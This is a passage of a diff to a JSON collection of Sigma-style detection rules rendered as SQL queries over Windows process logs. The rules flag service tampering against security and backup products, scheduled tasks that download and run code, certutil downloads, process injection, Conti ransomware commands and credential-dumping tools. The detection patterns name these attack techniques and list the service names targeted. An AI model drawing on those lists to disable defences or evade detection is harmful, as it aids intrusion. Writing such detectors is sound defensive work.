'%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE '%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_service_tamper.yml" + "filename": "proc_creation_win_schtasks_susp_pattern.yml" }, { - "title": "Computer System Reconnaissance Via Wmic.EXE", - "id": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", - "status": "experimental", - "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model, etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential DLL Injection Or Execution Using Tracker.exe", + "id": "148431ce-4b70-403d-8525-fcc2993f29ea", + "status": "test", + "description": "Detects potential DLL injection and execution using \"Tracker.exe\"", + "author": "Avneet Singh @v3t0_, oscd.community", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%computersystem%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\' OR Description = 'Tracker') AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ERRORREPORT:PROMPT %' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\amd64\\\\MSBuild.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wmic_recon_computersystem.yml" + "filename": "proc_creation_win_lolbin_tracker.yml" }, { - "title": "Conhost Spawned By Suspicious Parent Process", - "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", + "title": "Renamed Mavinject.EXE Execution", + "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", "status": "experimental", - "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", - "author": "Tim Rauch", + "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((NewProcessName LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_conhost_susp_parent.yml" + "filename": "proc_creation_win_renamed_mavinject.yml" }, { - "title": "Renamed Msdt.EXE Execution", - "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", + "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", "status": "experimental", - "description": "Detects the execution of a renamed \"Msdt.exe\" binary", - "author": "pH-T (Nextron Systems)", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.003" + "attack.t1027" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'msdt.exe' AND NOT (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_msdt.yml" + "filename": "proc_creation_win_certutil_download_direct_ip.yml" }, { - "title": "VsCode Child Process Anomaly", - "id": "5a3164f2-b373-4152-93cf-090b13c12d27", - "status": "experimental", - "description": "Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Processes Suspicious Parent Directory", + "id": "96036718-71cc-4027-a538-d1587e0006a7", + "status": "test", + "description": "Detect suspicious parent processes of well-known Windows processes", + "author": "vburov", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1036.003", + "attack.t1036.005" ], "falsepositives": [ - "In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly" + "Some security products seem to spawn these" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\code.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-Expressions%' ESCAPE '\\' OR CommandLine LIKE '%IEX%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')) OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsaiso.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\') AND NOT (((ParentProcessName LIKE '%\\\\SavService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (ParentProcessName = '' OR ParentProcessName = '-')))" ], - "filename": "proc_creation_win_vscode_child_processes_anomalies.yml" + "filename": "proc_creation_win_susp_proc_wrong_parent.yml" }, { - "title": "Potential Windows Defender Tampering Via Wmic.EXE", - "id": "51cbac1e-eee3-4a90-b1b7-358efb81fa0a", + "title": "Ilasm Lolbin Use Compile C-Sharp", + "id": "850d55f9-6eeb-4492-ad69-a72338f65ba4", "status": "experimental", - "description": "Detects potential tampering with Windows Defender settings such as adding exclusion using wmic", + "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '%/Namespace:\\\\\\\\root\\\\Microsoft\\\\Windows\\\\Defender%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ilasm.exe' ESCAPE '\\' OR OriginalFileName = 'ilasm.exe'))" ], - "filename": "proc_creation_win_wmic_namespace_defender.yml" + "filename": "proc_creation_win_lolbin_ilasm.yml" }, { - "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", - "id": "ef61af62-bc74-4f58-b49b-626448227652", - "status": "experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Formbook Process Creation", + "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "status": "test", + "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" + "filename": "proc_creation_win_malware_formbook.yml" }, { - "title": "Suspicious Scan Loop Network", - "id": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", + "title": "Suspicious Diantz Alternate Data Stream Execution", + "id": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", "status": "test", - "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", + "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059", - "attack.discovery", - "attack.t1018" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Legitimate script" + "Very Possible" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%foreach %' ESCAPE '\\') AND (CommandLine LIKE '%nslookup%' ESCAPE '\\' OR CommandLine LIKE '%ping%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" ], - "filename": "proc_creation_win_susp_network_scan_loop.yml" + "filename": "proc_creation_win_lolbin_diantz_ads.yml" }, { - "title": "New Service Creation Using PowerShell", - "id": "c02e96b7-c63a-4c47-bd83-4a9f74afcfb2", + "title": "Potential Conti Ransomware Activity", + "id": "689308fc-cfba-4f72-9897-796c1dc61487", "status": "test", - "description": "Detects the creation of a new service using powershell.", - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "description": "Detects a specific command used by the Conti ransomware group", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.impact", + "attack.s0575", + "attack.t1486" ], "falsepositives": [ - "Legitimate administrator or user creates a service for legitimate reasons.", - "Software installation" + "Unlikely" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_create_service.yml" + "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" }, { - "title": "GfxDownloadWrapper.exe Downloads File from Suspicious URL", - "id": "eee00933-a761-4cd0-be70-c42fe91731e7", - "status": "test", - "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", - "author": "Victor Sergeev, oscd.community", + "title": "HackTool - Quarks PwDump Execution", + "id": "0685b176-c816-4837-8e7b-1216f346636b", + "status": "experimental", + "description": "Detects usage of the Quarks PwDump tool via commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + 